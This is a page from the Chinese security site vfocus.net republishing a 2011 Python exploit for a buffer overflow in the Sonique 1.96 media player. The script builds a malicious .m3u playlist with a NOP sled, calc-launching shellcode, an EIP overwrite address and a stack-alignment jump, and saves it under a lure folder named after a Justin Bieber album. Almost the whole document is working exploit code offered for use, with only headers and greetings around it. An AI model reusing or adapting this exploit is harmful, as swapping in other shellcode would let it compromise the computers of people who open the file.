首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Sonique 1.96 .m3u Buffer Overflow
来源:vfocus.net 作者:Securityxxxpert 发布时间:2011-05-18  

#Application: Sonique BOF EIP Overwrite
#Version:  1.96
#Author: Securityxxxpert
#Date Submitted:  May 17, 2011
#Download Link: http://www.tucows.com/preview/193562
#Tested on:  Windows XP SP3
#EIP Overwritten: 239 Bytes
#Pita Bytes:  0x00 0x83 0x88 0x93
#Notes:  Not universal, find your own offsets if not SP3 Eng
#Notes Cont:  4 Nops is added before aligning the stack in order to
align the stack properly  without errors
#Humor: Waterbottle + Justin Bieber's Head = Pwnage
print
"--------------------------------------------------------------------------------"
print "                                      Sonique Player
Exploit                    "
print "                                      Retreat
Hell!                             "
print "Greetz:  Acidgen, Subinacls, GrumpyBear, Pyoor, Corelanc0d3r, Dr.
Nick, Rek0n   "
print "Greetz Cont: Connection, MaXe, ronin,
Intern0t,                                  "
print "Greetz Cont:  Podjackel, g0tmi1k & The entire Corelan & Offensive
Security Teams "
print
"--------------------------------------------------------------------------------"
import os
filename = "waterbottle.m3u"

nopsled="\x90"*93 #Sliding to pwnage
sc=("\x31\xC9\x51\x68\x63\x61\x6C\x63\x54\xB8\xC7\x93\xC2\x77\xFF\xD0")
#16 byte Calc Shellcode
filler = "\x90"*130
eip='\x6F\x9C\x10\x5D' #0x5D109C6F
alignjmp='\x83\xC3\x1c\x90'+'\xff\xe3' #Aligns the stack to EBX1c, then
Jumps to EBX *EBX1C*
Junk='\x42' * 10000

exploit = nopsled + sc + filler + eip + "\x90"* 4 + alignjmp + Junk
os.makedirs ("./Justin.Beiber -My World")
os.chdir ("./Justin.Beiber -My World")
textfile = open(filename,"w")
textfile.write(exploit)
textfile.close()


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·7-Technologies IGSS <= v9.00.0
·win32/xp sp3 Alphanumeric Shut
·Archos 5/Archos OS 2.0.45 Medi
·Microsoft Windows Vista/Server
·SpongeBob SquarePants Typing B
·Windows/32bit - Command Execut
·BSDi/x86 - BindShell on 31337
·linux/x86 Command Exec (reboot
·Rootage 1.0.0.4 Alpha Director
·Mac osX Browsers [FF + SF] ale
·Vmware vSphere Management Assi
·AVS Ringtone Maker 1.6.1 - SEH
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved